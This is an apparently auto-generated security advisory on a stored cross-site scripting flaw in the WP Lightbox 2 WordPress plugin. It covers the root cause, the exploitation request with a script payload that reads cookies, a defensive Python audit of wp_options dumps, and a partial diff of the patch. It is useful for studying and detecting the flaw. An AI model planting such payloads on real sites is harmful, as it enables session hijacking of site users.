Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: April 6, 2026

CVE-2026-1430: WP Lightbox 2 < 3.0.7 – Authenticated (Administrator+) Stored Cross-Site Scripting (wp-lightbox-2)

CVE ID CVE-2026-1430
Plugin wp-lightbox-2
Severity Medium (CVSS 4.4)
CWE 79
Vulnerable Version < 3.0.7
Patched Version 3.0.7
Disclosed March 29, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-1430:
This vulnerability is an authenticated stored cross-site scripting (XSS) flaw in the WP Lightbox 2 WordPress plugin in versions prior to 3.0.7. The plugin's general settings page lets administrators (more precisely, any user holding the 'manage_options' capability) save a free-text option, jqlb_help_text, and the AJAX save handler stores whatever is submitted without sanitization, so an administrator can persist arbitrary HTML and JavaScript in the database through it. The CVSS score of 4.4 reflects the administrator privilege required and the fact that the issue only adds anything on installations where administrators are not already allowed to post unfiltered HTML (WordPress multisite, or sites where the unfiltered_html capability has been removed).

The root cause is the absence of input sanitization in the plugin's AJAX save handler, save_parametrs() in wp-lightbox-2/admin/general_settings.php. For every key in the plugin's defaults array it stores stripslashes($_POST[$key]) through update_option() with no type, length or content check, so jqlb_help_text accepts any string. The settings page template shown in the diff is not the output sink: in the vulnerable version every option value is passed through esc_attr() in the loop $$key = esc_attr($value); before being echoed into value="<?php echo $jqlb_help_text; ?>", so the value attributes on that page were already attribute-escaped. The field is described on the page as text that "will appear below images", i.e. it is rendered by the plugin's frontend lightbox; that rendering code is not part of the diff shown on this page, so the exact sink and its escaping cannot be confirmed here.

Exploitation requires an attacker with administrator privileges or the 'manage_options' capability to submit a malicious payload through the plugin's AJAX settings update endpoint. The attacker sends a POST request to /wp-admin/admin-ajax.php with action=save_in_databese_lightbox2, the nonce field wp_lightbox_2_general_settings_page (rendered by wp_nonce_field() on the settings page, so anyone who can load that page already has a valid nonce), and the vulnerable parameter jqlb_help_text carrying a JavaScript payload, for example jqlb_help_text='><script>alert(document.cookie)</script>. The handler updates every option whose key is present in the request and only prints an error for keys that are missing, so the request does not need to carry the other eight settings. Once stored, the payload persists in wp_options and executes wherever the plugin outputs the help text without escaping; the settings page (/wp-admin/admin.php?page=WP-Lightbox-2) re-displays the stored value, but inside an esc_attr()-escaped value attribute.

The patch in version 3.0.7 does not change how the value is stored: save_parametrs() still writes stripslashes($_POST[$key]) to update_option(). On the settings page it replaces the escaping loop with extract( $initial_values ) and applies esc_attr() at each output point instead (value="<?php echo esc_attr( $jqlb_help_text ); ?>"), which preserves the attribute escaping the old template already had. The substantive hardening visible in the diff is the new guard at the top of save_parametrs(), if ( ! current_user_can( 'manage_options' ) || ! wp_doing_ajax() ): previously the wp_ajax_ action was reachable by any logged-in user and protected only by the nonce, because the manage_options requirement on the menu registration gates the admin page, not the AJAX handler. The patch also reformats the code and changes the field's description to "Text only (no HTML)"; any change to the frontend rendering of jqlb_help_text is not included in the portion of the diff shown here.

Successful exploitation allows an attacker who already holds administrator access to execute arbitrary JavaScript in the browser of anyone who views a page on which the stored text is rendered. Typical follow-on actions are session hijacking, creating additional privileged accounts (including super administrator on multisite, if a super administrator triggers the payload), installing backdoors through the plugin or theme editors, data exfiltration, or redirecting visitors to malicious sites. The value to an attacker is persistence: the payload stays in wp_options and fires on every render, giving a foothold that survives the loss of the original credentials. On a single-site install administrators hold unfiltered_html by default and could post script in content anyway; the flaw matters on WordPress multisite, where only super administrators have unfiltered_html, and on sites that remove the capability (for example with DISALLOW_UNFILTERED_HTML), because it lets an administrator store script that KSES would otherwise strip from their content.
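As an added example, not code from Atomic Edge or from the plugin, the following Python script turns the analysis above into a check an incident responder can run offline: it parses the INSERT rows of a mysqldump export of wp_options, validates each of the plugin's nine general-settings options against the type its settings-page input implies (0/1 for the checkbox mirrors, the min/max bounds of the number inputs, and no markup in jqlb_help_text), and reports anything a hardened save_parametrs() should have rejected. The option names and ranges come from the plugin code in the diff below; the dump row format, the markup pattern and the sample rows are assumptions.

```python
"""Offline audit of WP Lightbox 2 options in a wp_options dump.

Added example; not code from Atomic Edge or from the plugin.  It parses the
INSERT rows of a mysqldump export of wp_options, validates every general
settings option of the plugin against the type its settings-page input
implies, and reports values a hardened save handler would have rejected.
Option names and numeric ranges come from the plugin code in the diff; the
dump row format, the markup pattern and the sample rows are assumptions.
"""
import re
from dataclasses import dataclass

# Option keys from the plugin's $general_settings defaults array.
CHECKBOX_OPTIONS = {
    "jqlb_automate", "jqlb_comments", "jqlb_resize_on_demand",
    "jqlb_show_download", "jqlb_navbarOnTop",
}
# Bounds mirror the min/max attributes on the settings page number inputs.
INT_OPTIONS = {
    "jqlb_overlay_opacity": (0, 100),
    "jqlb_margin_size": (0, 999),
    "jqlb_resize_speed": (0, 9_999_999),
}
TEXT_OPTIONS = {"jqlb_help_text"}  # described as "Text only (no HTML)"
KNOWN_OPTIONS = CHECKBOX_OPTIONS | set(INT_OPTIONS) | TEXT_OPTIONS

# One mysqldump row: (option_id,'option_name','option_value','autoload').
# Assumption: the dump uses mysqldump's default single-quoted, backslash-escaped form.
ROW_RE = re.compile(r"\((\d+),'([^']*)','((?:[^'\\]|\\.)*)','(yes|no)'\)")
# Heuristic for anything that could open a tag, a javascript: URL or an on* attribute.
MARKUP_RE = re.compile(r"[<>]|javascript:|\bon\w+\s*=", re.IGNORECASE)


def unescape_sql(value: str) -> str:
    """Undo mysqldump backslash escaping of quotes, backslashes, newlines and NULs."""
    specials = {"n": "\n", "r": "\r", "0": "\0"}
    return re.sub(r"\\(.)", lambda m: specials.get(m.group(1), m.group(1)), value)


def parse_options(dump: str) -> dict[str, str]:
    """Return option_name -> decoded option_value, in dump order."""
    return {name: unescape_sql(raw) for _id, name, raw, _autoload in ROW_RE.findall(dump)}


def validate(name: str, value: str):
    """Return the canonical value of a known option or raise ValueError.

    These are the checks save_parametrs() should apply before update_option();
    the WordPress equivalents are a 0/1 check for the checkbox mirrors, absint()
    plus a range check for the numbers, and sanitize_text_field() for the text.
    """
    if name in CHECKBOX_OPTIONS:
        if value not in ("0", "1"):
            raise ValueError("checkbox option must be 0 or 1")
        return int(value)
    if name in INT_OPTIONS:
        low, high = INT_OPTIONS[name]
        if not value.isdigit() or not low <= int(value) <= high:
            raise ValueError(f"expected an integer in [{low}, {high}]")
        return int(value)
    if name in TEXT_OPTIONS:
        if MARKUP_RE.search(value):
            raise ValueError("markup is not allowed in a text-only field")
        return " ".join(value.split())  # collapse whitespace, keep plain text
    raise KeyError(f"{name} is not a WP Lightbox 2 general setting")


@dataclass
class Finding:
    option: str
    value: str
    reason: str


def audit(dump: str) -> list[Finding]:
    """Validate every known plugin option in the dump and collect the failures."""
    findings = []
    for name, value in parse_options(dump).items():
        if name not in KNOWN_OPTIONS:
            continue  # core options and the deprecated design settings are out of scope
        try:
            validate(name, value)
        except ValueError as err:
            findings.append(Finding(name, value, str(err)))
    return findings


# Constructed sample of a mysqldump export (not real data): one injected help
# text, one out-of-range number, and clean or unrelated rows around them.
SAMPLE_DUMP = (
    "INSERT INTO `wp_options` VALUES "
    "(100,'siteurl','https://blog.example','yes'),"
    "(101,'jqlb_overlay_opacity','80','yes'),"
    "(102,'jqlb_help_text','\\\"><script>alert(document.cookie)</script>','yes'),"
    "(103,'jqlb_automate','1','yes'),"
    "(104,'jqlb_margin_size','1200','yes'),"
    "(105,'jqlb_border_width','10','yes');"
)

if __name__ == "__main__":
    for finding in audit(SAMPLE_DUMP):
        print(f"{finding.option}: {finding.reason} (stored value: {finding.value!r})")
```

Run it against the output of mysqldump --no-create-info for the wp_options table; a finding on jqlb_help_text is the indicator of compromise for this CVE, and the validate() rules are the same per-option checks the plugin's save handler should enforce before update_option(), with sanitize_text_field() and absint() as the WordPress equivalents.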

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff
--- a/wp-lightbox-2/admin/admin_menu.php
+++ b/wp-lightbox-2/admin/admin_menu.php
@@ -1,73 +1,97 @@
-<?php
-require_once($this->plugin_path.'admin/general_settings.php');
+<?php

-class wp_lightbox_admin_menu{
-
-	private $menu_name;
-
+require_once $this->plugin_path . 'admin/general_settings.php';
+
+class wp_lightbox_admin_menu {
+
+	private $menu_name;
 	private $databese_parametrs;
-
 	private $plugin_url;
-
 	private $plugin_path;
-
-	private $text_parametrs;

-	public  $wp_lightbox_2_general_settings_page;
-
-	function __construct($param){
-		$this->menu_name='WP Lightbox 2';
-		$this->databese_parametrs=$param['databese_parametrs']->get_general_settings;
-
-		$this->wp_lightbox_2_general_settings_page  =new wp_lightbox_2_general_settings_page( array( 'plugin_url'=> $this->plugin_url, 'plugin_path' => $this->plugin_path,'databese_settings' =>$this->databese_parametrs));
-
-		// set plugin url
-		if(isset($param['plugin_url']))
-			$this->plugin_url=$param['plugin_url'];
-		else
-			$this->plugin_url=trailingslashit(dirname(plugins_url('',__FILE__)));
-		// set plugin path
-		if(isset($param['plugin_path']))
-			$this->plugin_path=$param['plugin_path'];
-		else
-			$this->plugin_path=trailingslashit(dirname(plugin_dir_path(__FILE__)));
+	public $wp_lightbox_2_general_settings_page;
+
+	public function __construct( $param = array() ) {
+		$this->menu_name		  = 'WP Lightbox 2';
+		$this->databese_parametrs = $param[ 'databese_parametrs' ]->get_general_settings;
+
+		$this->wp_lightbox_2_general_settings_page = new wp_lightbox_2_general_settings_page( array(
+			'plugin_url'        => $this->plugin_url,
+			'plugin_path'       => $this->plugin_path,
+			'databese_settings' => $this->databese_parametrs
+		) );

-
+		// set plugin url
+		if ( isset( $param[ 'plugin_url' ] ) ) {
+			$this->plugin_url = $param[ 'plugin_url' ];
+		} else {
+			$this->plugin_url = trailingslashit( dirname( plugins_url( '', __FILE__ ) ) );
+		}

+		// set plugin path
+		if ( isset( $param[ 'plugin_path' ] ) ) {
+			$this->plugin_path = $param[ 'plugin_path' ];
+		} else {
+			$this->plugin_path = trailingslashit( dirname( plugin_dir_path( __FILE__ ) ) );
+		}
 	}

-
-	/// function for registr new button
-	function poll_button_register($plugin_array)
-	{
-		$url = $this->plugin_url.'admin/scripts/editor_plugin.js';
-		$plugin_array["poll_mce"] = $url;
+	public function poll_button_register( $plugin_array = array() ) {
+		$url                        = $this->plugin_url . 'admin/scripts/editor_plugin.js';
+		$plugin_array[ "poll_mce" ] = $url;
+
 		return $plugin_array;
-
 	}

+	public function create_menu() {

-	public function window_for_inserting_contentt(){}
-	public function create_menu(){
-
-		$manage_page_main = add_menu_page( $this->menu_name, $this->menu_name, 'manage_options', str_replace( ' ', '-', $this->menu_name), array($this->wp_lightbox_2_general_settings_page, 'controller_page'),$this->plugin_url.'admin/images/icon_lightboxx2.png');
-							add_submenu_page( str_replace( ' ', '-', $this->menu_name), 'General settings', 'General settings', 'manage_options', str_replace( ' ', '-', $this->menu_name), array($this->wp_lightbox_2_general_settings_page, 'controller_page'));
-		add_action('admin_print_styles-' .$manage_page_main, array($this,'menu_requeried_scripts'));
+		$manage_page_main = add_menu_page(
+			$this->menu_name,
+			$this->menu_name,
+			'manage_options',
+			str_replace( ' ', '-', $this->menu_name ),
+			array(
+				$this->wp_lightbox_2_general_settings_page,
+				'controller_page'
+			),
+			$this->plugin_url . 'admin/images/icon_lightboxx2.png'
+		);
+
+		add_submenu_page(
+			str_replace( ' ', '-', $this->menu_name ),
+			'General settings',
+			'General settings',
+			'manage_options',
+			str_replace( ' ', '-', $this->menu_name ),
+			array(
+				$this->wp_lightbox_2_general_settings_page,
+				'controller_page'
+			)
+		);
+
+		add_action(
+			'admin_print_styles-' . $manage_page_main,
+			array(
+				$this,
+				'menu_requeried_scripts'
+			)
+		);
 	}
-	public function menu_requeried_scripts(){
-		wp_enqueue_script('jquery-ui-style');
-		wp_enqueue_script('jquery');
-		wp_enqueue_script('jquery-ui-core');
-		wp_enqueue_script("jquery-ui-widget");
-		wp_enqueue_script("jquery-ui-mouse");
-		wp_enqueue_script("jquery-ui-slider");
-		wp_enqueue_script("jquery-ui-sortable");
-		wp_enqueue_script('wp-color-picker');
-		wp_enqueue_style("jquery-ui-style");
-		wp_enqueue_style("admin_style_wp_lightbox");
+
+	public function menu_requeried_scripts() {
+		wp_enqueue_script( 'jquery-ui-style' );
+		wp_enqueue_script( 'jquery' );
+		wp_enqueue_script( 'jquery-ui-core' );
+		wp_enqueue_script( 'jquery-ui-widget' );
+		wp_enqueue_script( 'jquery-ui-mouse' );
+		wp_enqueue_script( 'jquery-ui-slider' );
+		wp_enqueue_script( 'jquery-ui-sortable' );
+		wp_enqueue_script( 'wp-color-picker' );
+
+		wp_enqueue_style( 'jquery-ui-style' );
+		wp_enqueue_style( 'admin_style_wp_lightbox' );
 		wp_enqueue_style( 'wp-color-picker' );
+
 		add_thickbox();
-
 	}
-
-}
 No newline at end of file
+}
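Review bot: the reformatted __construct() still instantiates wp_lightbox_2_general_settings_page before $this->plugin_url and $this->plugin_path are assigned, so the array( 'plugin_url' => $this->plugin_url, 'plugin_path' => $this->plugin_path, ... ) it passes contains nulls and the settings page silently falls back to its own path detection; move the two blocks under // set plugin url and // set plugin path above the new ... call, or drop the arguments if the fallback is intended. Minor: wp_enqueue_script( 'jquery-ui-style' ) enqueues a stylesheet handle as a script and is redundant with the wp_enqueue_style( 'jquery-ui-style' ) a few lines later, so it can be removed while the function is being tidied.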
--- a/wp-lightbox-2/admin/general_settings.php
+++ b/wp-lightbox-2/admin/general_settings.php
@@ -1,245 +1,266 @@
 <?php
 class wp_lightbox_2_general_settings_page{
-	private $menu_name;
+
 	private $databese_settings;
 	public  $initial_values;

 	protected $plugin_url = '';
 	protected $plugin_path = '';

-	function __construct($params){
+	public function __construct( $params = array() ) {
+
 		// set plugin url
-		if(isset($params['plugin_url']))
-			$this->plugin_url=$params['plugin_url'];
-		else
-			$this->plugin_url=trailingslashit(dirname(plugins_url('',__FILE__)));
+		if ( isset( $params['plugin_url'] ) ) {
+			$this->plugin_url = $params['plugin_url'];
+		} else {
+			$this->plugin_url = trailingslashit(dirname(plugins_url('',__FILE__)));
+		}
+
 		// set plugin path
-		if(isset($params['plugin_path']))
-			$this->plugin_path=$params['plugin_path'];
-		else
-			$this->plugin_path=trailingslashit(dirname(plugin_dir_path('',__FILE__)));
+		if ( isset( $params['plugin_path'] ) ) {
+			$this->plugin_path = $params['plugin_path'];
+		} else {
+			$this->plugin_path = trailingslashit(dirname(plugin_dir_path('',__FILE__)));
+		}

-		$this->databese_settings=$params['databese_settings'];
+		$this->databese_settings = $params['databese_settings'];

 		/*ajax parametrs*/
-		add_action( 'wp_ajax_save_in_databese_lightbox2', array($this,'save_parametrs') );
-
+		add_action( 'wp_ajax_save_in_databese_lightbox2', array( $this,'save_parametrs' ) );
 	}
-	public function save_parametrs(){
-		 $initial_values= $this->databese_settings;
-	$kk=1;
-		if(isset($_POST['wp_lightbox_2_general_settings_page']) && wp_verify_nonce( $_POST['wp_lightbox_2_general_settings_page'],'wp_lightbox_2_general_settings_page')){
-
-			foreach($initial_values as $key => $value){
-				if(isset($_POST[$key])){
-					update_option($key,stripslashes($_POST[$key]));
-				}
-				else{
-					$kk=0;
-					printf('error saving %s <br>',$key);
+
+	public function save_parametrs() {
+		$initial_values = $this->databese_settings;
+		$kk = 1;
+
+		if ( ! current_user_can( 'manage_options' ) || ! wp_doing_ajax() ) {
+			die('Authorization Problem');
+		}
+
+		if ( isset( $_POST['wp_lightbox_2_general_settings_page'] ) && wp_verify_nonce( $_POST['wp_lightbox_2_general_settings_page'], 'wp_lightbox_2_general_settings_page' ) ) {
+
+			foreach ( $initial_values as $key => $value ) {
+				if ( isset( $_POST[ $key ] ) ) {
+					update_option( $key, stripslashes( $_POST[ $key ] ) );
+				} else {
+					$kk = 0;
+
+					printf( 'error saving %s <br>', $key );
 				}
 			}
+		} else {
+			die('Authorization Problem');
 		}
-		else{
-			die('Authorization Problem ');
-		}
-		if($kk==0){
+
+		if ( empty( $kk ) ) {
 			exit;
 		}
+
 		die('sax_normala');
 	}
-	/*#################### CONTROLERRR ########################*/
-	/*#################### CONTROLERRR ########################*/
-	/*#################### CONTROLERRR ########################*/
-	public function controller_page(){

-			$this->display_table_list_answers();
+	public function controller_page() {
+		$this->display_table_list_answers();
 	}

+	private function display_table_list_answers() {

-	private function display_table_list_answers(){
+		$initial_values = $this->databese_settings;

-    $initial_values= $this->databese_settings;
-    foreach($initial_values as $key => $value){
-			$$key=esc_attr($value);
-	}
-	?>
+		// Allow
+		extract( $initial_values );

-        <style>
-		.popup_settings{
-			<?php echo $youtube_plus_show_popup?'':'display:none;'; ?>
-		}
-        </style>
-        <h2>Lightbox General Settings</h2>
-        <div class="main_yutube_plus_params">
-        <table class="wp-list-table widefat fixed posts wp_lightbox2_settings_table" style="width: 900px; min-width:320px !important;table-layout: fixed;">
-            <thead>
-                <tr>
-                    <th width="50%">
-                   		<span> Lightbox General Settings </span>
-                    </th>
-                    <th width="50%">
-                    	 
-                   	</th>
-                </tr>
-            </thead>
-            <tbody>
-                <tr class="parametr_chechbox">
-                    <td>
-                   		Use Lightbox for all image links: <span title="Enable or disable the lightbox." class="desription_class">?</span>
-                    </td>
-                    <td>
-                    	<input type="checkbox" name="jqlb_automate_checkbox" id="jqlb_automate_checkbox" <?php checked($jqlb_automate,'1'); ?> value="1">
-                    	<input type="hidden" name="jqlb_automate" id="jqlb_automate" value="<?php echo $jqlb_automate; ?>">
-                    </td>
-                </tr>
-                <tr class="parametr_chechbox">
-                    <td>
-                   		Enable lightbox in comments: <span title="This feature will enable lightbox for your comments. " class="desription_class">?</span>
-                    </td>
-                    <td>
-                    	<input type="checkbox" name="jqlb_comments_checkbox" id="jqlb_comments_checkbox" <?php checked($jqlb_comments,'1'); ?> value="1">
-                    	<input type="hidden" name="jqlb_comments" id="jqlb_comments" value="<?php echo $jqlb_comments; ?>">
-                    </td>
-                </tr>
-                <tr class="parametr_chechbox">
-                    <td>
-                    	Show download link: <span title="You can display download link." class="desription_class">?</span>
-                    </td>
-                    <td>
-                    	<input type="checkbox" name="jqlb_show_download_checkbox" id="jqlb_show_download_checkbox" <?php checked($jqlb_show_download,'1'); ?> value="1">
-                    	<input type="hidden" name="jqlb_show_download" id="jqlb_show_download" value="<?php echo $jqlb_show_download; ?>">
-                    </td>
-                </tr>
-                <tr>
-                    <td>
-                    	Overlay opacity: <span title="Set overlay opacity for lightbox." class="desription_class">?</span>
-                    </td>
-                    <td>
-						<input type="number" min="0" max="100" step="1" name="jqlb_overlay_opacity" id="jqlb_overlay_opacity" value="<?php echo $jqlb_overlay_opacity; ?>"><span class="befor_input_small_desc">%</span>
-                    </td>
-                </tr>
-                <tr class="parametr_chechbox">
-                    <td>
-                  	 	Show image info on top: <span title="Choose image info position." class="desription_class">?</span>
-                    </td>
-                    <td>
-                    	<input type="checkbox" name="jqlb_navbarOnTop_checkbox" id="jqlb_navbarOnTop_checkbox" <?php checked($jqlb_navbarOnTop,'1'); ?> value="1">
-                    	<input type="hidden" name="jqlb_navbarOnTop" id="jqlb_navbarOnTop" value="<?php echo $jqlb_navbarOnTop; ?>">
-                    </td>
-                </tr>
-                <tr class="parametr_chechbox">
-                    <td>
-                   		Reduce large images to fit smaller screens: <span title="We recommend to enable this option, it will reduce large images to fit smaller screens." class="desription_class">?</span>
-                    </td>
-                    <td>
-                    	<input type="checkbox" name="jqlb_resize_on_demand_checkbox" id="jqlb_resize_on_demand_checkbox" <?php checked($jqlb_resize_on_demand,'1'); ?> value="1">
-                    	<input type="hidden" name="jqlb_resize_on_demand" id="jqlb_resize_on_demand" value="<?php echo $jqlb_resize_on_demand; ?>">
-                    </td>
-                </tr>
-                <tr>
-                    <td>
-                    	Minimum margin from top:  <span title="You can change image position from top." class="desription_class">?</span>
-                    </td>
-                    <td>
-                    	<input type="number" min="0" max="999" step="1" name="jqlb_margin_size" id="jqlb_margin_size" value="<?php echo $jqlb_margin_size; ?>"><span class="befor_input_small_desc">(default: 0)</span>
-                    </td>
-                </tr>
-                <tr>
-                    <td>
-                   		Lightbox Animation duration: <span title="Type here animation duration for lightbox." class="desription_class">?</span>
-                    </td>
-                    <td>
-                    	<input type="number" min="0" max="9999999" step="1" name="jqlb_resize_speed" id="jqlb_resize_speed" value="<?php echo $jqlb_resize_speed; ?>"><span class="befor_input_small_desc">(milliseconds)</span>
-                    </td>
-                </tr>
-                <tr>
-                    <td>
-                    	Additional text below image info:  <span title="Type here text, and it will appear below images. " class="desription_class">?</span>
-                    </td>
-                    <td>
-                    	<input type="text" name="jqlb_help_text" id="jqlb_help_text" value="<?php echo $jqlb_help_text; ?>"><span class="befor_input_small_desc">(default: none)</span>
-                    </td>
-                </tr>
-            </tbody>
-            <tfoot>
-                <tr>
-                    <th colspan="2" width="100%"><button type="button" id="save_button_general" class="save_button button button-primary"><span class="save_button_span">Save Settings</span> <span class="saving_in_progress"> </span><span class="sucsses_save"> </span><span class="error_in_saving"> </span></button></th>
-                </tr>
-            </tfoot>
-		</table>
-		<ol>
-	<li>You can use WordPress image galleries and have them grouped and auto-lightboxed: <a href="http://codex.wordpress.org/Gallery_Shortcode"><code>[gallery link="file"]</code></a></li>
-	<li>You can also add a <code>rel="lightbox"</code> attribute to any link tag to activate the lightbox. For example:
-	<pre><code>	<a href="images/image-1.jpg" rel="lightbox" title="my caption">image #1</a></code></pre>
-	<em>Optional:</em> Use the <code>title</code> attribute if you want to show a caption.
-	</li>
-	<li>If you have a set of related images that you would like to group, simply include a group name in the rel attribute. For example:
-	<pre><code>	<a href="images/image-1.jpg" rel="lightbox[roadtrip]">image #1</a>
-	<a href="images/image-2.jpg" rel="lightbox[roadtrip]">image #2</a>
-	<a href="images/image-3.jpg" rel="lightbox[roadtrip]">image #3</a></code></pre>
-	No limits to the number of image sets per page or how many images are allowed in each set. Go nuts!</li>
-	<li>To <strong>disable</strong> lightboxing of an image link, just set any other rel-attribute: <code>rel="nobox"</code></li>
-	</ol>
-
-         <?php wp_nonce_field('wp_lightbox_2_general_settings_page','wp_lightbox_2_general_settings_page'); ?>
-	</div><br /><br /><span class="error_massage"></span>
-
-		<script>
+		// jQuery settings
+		$jquery_settings = '';
+		$keys            = array_keys( $initial_values );
+		foreach ( $keys as $key ) {
+			$jquery_settings .= $key . ':jQuery("#' . $key . '").val(),';
+		}

+		?>

+		<h2>Lightbox General Settings</h2>
+		<div class="main_yutube_plus_params">
+		<table class="wp-list-table widefat fixed posts wp_lightbox2_settings_table" style="width: 900px; min-width:320px !important;table-layout: fixed;">
+			<thead>
+				<tr>
+					<th width="50%">
+						<span> Lightbox General Settings </span>
+					</th>
+					<th width="50%">
+						 
+					</th>
+				</tr>
+			</thead>
+			<tbody>
+				<tr class="parametr_chechbox">
+					<td>
+						Use Lightbox for all image links: <span title="Enable or disable the lightbox." class="desription_class">?</span>
+					</td>
+					<td>
+						<input type="checkbox" name="jqlb_automate_checkbox" id="jqlb_automate_checkbox" <?php checked( $jqlb_automate, '1' ); ?> value="1">
+						<input type="hidden" name="jqlb_automate" id="jqlb_automate" value="<?php echo esc_attr( $jqlb_automate ); ?>">
+					</td>
+				</tr>
+				<tr class="parametr_chechbox">
+					<td>
+						Enable lightbox in comments: <span title="This feature will enable lightbox for your comments. " class="desription_class">?</span>
+					</td>
+					<td>
+						<input type="checkbox" name="jqlb_comments_checkbox" id="jqlb_comments_checkbox" <?php checked( $jqlb_comments, '1' ); ?> value="1">
+						<input type="hidden" name="jqlb_comments" id="jqlb_comments" value="<?php echo esc_attr( $jqlb_comments ); ?>">
+					</td>
+				</tr>
+				<tr class="parametr_chechbox">
+					<td>
+						Show download link: <span title="You can display download link." class="desription_class">?</span>
+					</td>
+					<td>
+						<input type="checkbox" name="jqlb_show_download_checkbox" id="jqlb_show_download_checkbox" <?php checked( $jqlb_show_download, '1' ); ?> value="1">
+						<input type="hidden" name="jqlb_show_download" id="jqlb_show_download" value="<?php echo esc_attr( $jqlb_show_download ); ?>">
+					</td>
+				</tr>
+				<tr>
+					<td>
+						Overlay opacity: <span title="Set overlay opacity for lightbox." class="desription_class">?</span>
+					</td>
+					<td>
+						<input type="number" min="0" max="100" step="1" name="jqlb_overlay_opacity" id="jqlb_overlay_opacity" value="<?php echo esc_attr( $jqlb_overlay_opacity ); ?>"><span class="befor_input_small_desc">%</span>
+					</td>
+				</tr>
+				<tr class="parametr_chechbox">
+					<td>
+						Show image info on top: <span title="Choose image info position." class="desription_class">?</span>
+					</td>
+					<td>
+						<input type="checkbox" name="jqlb_navbarOnTop_checkbox" id="jqlb_navbarOnTop_checkbox" <?php checked( $jqlb_navbarOnTop, '1' ); ?> value="1">
+						<input type="hidden" name="jqlb_navbarOnTop" id="jqlb_navbarOnTop" value="<?php echo esc_attr( $jqlb_navbarOnTop ); ?>">
+					</td>
+				</tr>
+				<tr class="parametr_chechbox">
+					<td>
+						Reduce large images to fit smaller screens: <span title="We recommend to enable this option, it will reduce large images to fit smaller screens." class="desription_class">?</span>
+					</td>
+					<td>
+						<input type="checkbox" name="jqlb_resize_on_demand_checkbox" id="jqlb_resize_on_demand_checkbox" <?php checked( $jqlb_resize_on_demand, '1' ); ?> value="1">
+						<input type="hidden" name="jqlb_resize_on_demand" id="jqlb_resize_on_demand" value="<?php echo esc_attr( $jqlb_resize_on_demand ); ?>">
+					</td>
+				</tr>
+				<tr>
+					<td>
+						Minimum margin from top: <span title="You can change image position from top." class="desription_class">?</span>
+					</td>
+					<td>
+						<input type="number" min="0" max="999" step="1" name="jqlb_margin_size" id="jqlb_margin_size" value="<?php echo esc_attr( $jqlb_margin_size ); ?>"><span class="befor_input_small_desc">(default: 0)</span>
+					</td>
+				</tr>
+				<tr>
+					<td>
+						Lightbox Animation duration: <span title="Animation duration for lightbox." class="desription_class">?</span>
+					</td>
+					<td>
+						<input type="number" min="0" max="9999999" step="1" name="jqlb_resize_speed" id="jqlb_resize_speed" value="<?php echo esc_attr( $jqlb_resize_speed ); ?>"><span class="befor_input_small_desc">(milliseconds)</span>
+					</td>
+				</tr>
+				<tr>
+					<td>
+						Additional text below image info: <span title="Text only (no HTML) that will appear below images. " class="desription_class">?</span>
+					</td>
+					<td>
+						<input type="text" name="jqlb_help_text" id="jqlb_help_text" value="<?php echo esc_attr( $jqlb_help_text ); ?>"><span class="befor_input_small_desc">(default: none)</span>
+					</td>
+				</tr>
+			</tbody>
+			<tfoot>
+				<tr>
+					<th colspan="2" width="100%">
+						<button type="button" id="save_button_general" class="save_button button button-primary">
+							<span class="save_button_span">Save Settings</span>
+							<span class="saving_in_progress"></span>
+							<span class="sucsses_save"></span>
+							<span class="error_in_saving"></span>
+						</button>
+					</th>
+				</tr>
+			</tfoot>
+		</table>

-		jQuery(document).ready(function(e) {
-
-			 jQuery('#save_button_general').click(function(){
-
-					jQuery('#save_button_general').addClass('padding_loading');
-					jQuery("#save_button_general").prop('disabled', true);
-					jQuery('.saving_in_progress').css('display','inline-block');
-					generete_checkbox('parametr_chechbox');
-
-					jQuery.ajax({
-						type:'POST',
-						url: "<?php echo admin_url( 'admin-ajax.php?action=save_in_databese_lightbox2' ); ?>",
-						data: {wp_lightbox_2_general_settings_page:jQuery('#wp_lightbox_2_general_settings_page').val()<?php foreach($initial_values as $key => $value){echo ','.$key.':jQuery("#'.$key.'").val()';} ?>},
-					}).done(function(date) {
-						if(date=='sax_normala'){
-							console.log
+		<ol>
+			<li>You can use WordPress image galleries and have them grouped and auto-lightboxed: <a href="https://codex.wordpress.org/Gallery_Shortcode"><code>[gallery link="file"]</code></a></li>
+			<li>You can also add a <code>rel="lightbox"</code> attribute to any link tag to activate the lightbox. For example:
+				<pre><a href="images/image-1.jpg" rel="lightbox" title="my caption">image #1</a></pre>
+				<em>Optional:</em> Use the <code>title</code> attribute if you want to show a caption.
+			</li>
+			<li>If you have a set of related images that you would like to group, simply include a group name in the rel attribute. For example:
+				<pre><a href="images/image-1.jpg" rel="lightbox[roadtrip]">image #1</a>
+<a href="images/image-2.jpg" rel="lightbox[roadtrip]">image #2</a>
+<a href="images/image-3.jpg" rel="lightbox[roadtrip]">image #3</a></pre>
+				No limits to the number of image sets per page or how many images are allowed in each set. Go nuts!
+			</li>
+			<li>To <strong>disable</strong> lightboxing of an image link, just set any other rel-attribute: <code>rel="nobox"</code></li>
+		</ol>
+
+		<?php wp_nonce_field( 'wp_lightbox_2_general_settings_page', 'wp_lightbox_2_general_settings_page' ); ?>
+	</div>
+
+	<br /><br /><span class="error_massage"></span>
+
+	<script>
+
+		jQuery(document).ready(function() {
+
+			jQuery('#save_button_general').click(function(){
+
+				jQuery('#save_button_general').addClass('padding_loading');
+				jQuery("#save_button_general").prop('disabled', true);
+				jQuery('.saving_in_progress').css('display','inline-block');
+
+				generete_checkbox('parametr_chechbox');
+
+				jQuery.ajax({
+					type:'POST',
+					url: "<?php echo admin_url( 'admin-ajax.php?action=save_in_databese_lightbox2' ); ?>",
+					data: {
+						wp_lightbox_2_general_settings_page:jQuery('#wp_lightbox_2_general_settings_page').val(),
+						<?php echo $jquery_settings; ?>
+					}
+				}).done(function(date) {
+					if(date==='sax_normala'){
 						jQuery('.saving_in_progress').css('display','none');
 						jQuery('.sucsses_save').css('display','inline-block');
-						setTimeout(function(){jQuery('.sucsses_save').css('display','none');jQuery('#save_button_general').removeClass('padding_loading');jQuery("#save_button_general").prop('disabled', false);},2500);
-						}else{
-							jQuery('.saving_in_progress').css('display','none');
-							jQuery('.error_in_saving').css('display','inline-block');
-							jQuery('.error_massage').css('display','inline-block');
-							jQuery('.error_massage').html(date);
-							setTimeout(function(){jQuery('#save_button_general').removeClass('padding_loading');jQuery("#save_button_general").prop('disabled', false);},5000);
-						}

-					});
+						setTimeout( function() {
+							jQuery('.sucsses_save').css('display','none');
+							jQuery('#save_button_general').removeClass('padding_loading');
+							jQuery("#save_button_general").prop('disabled', false);
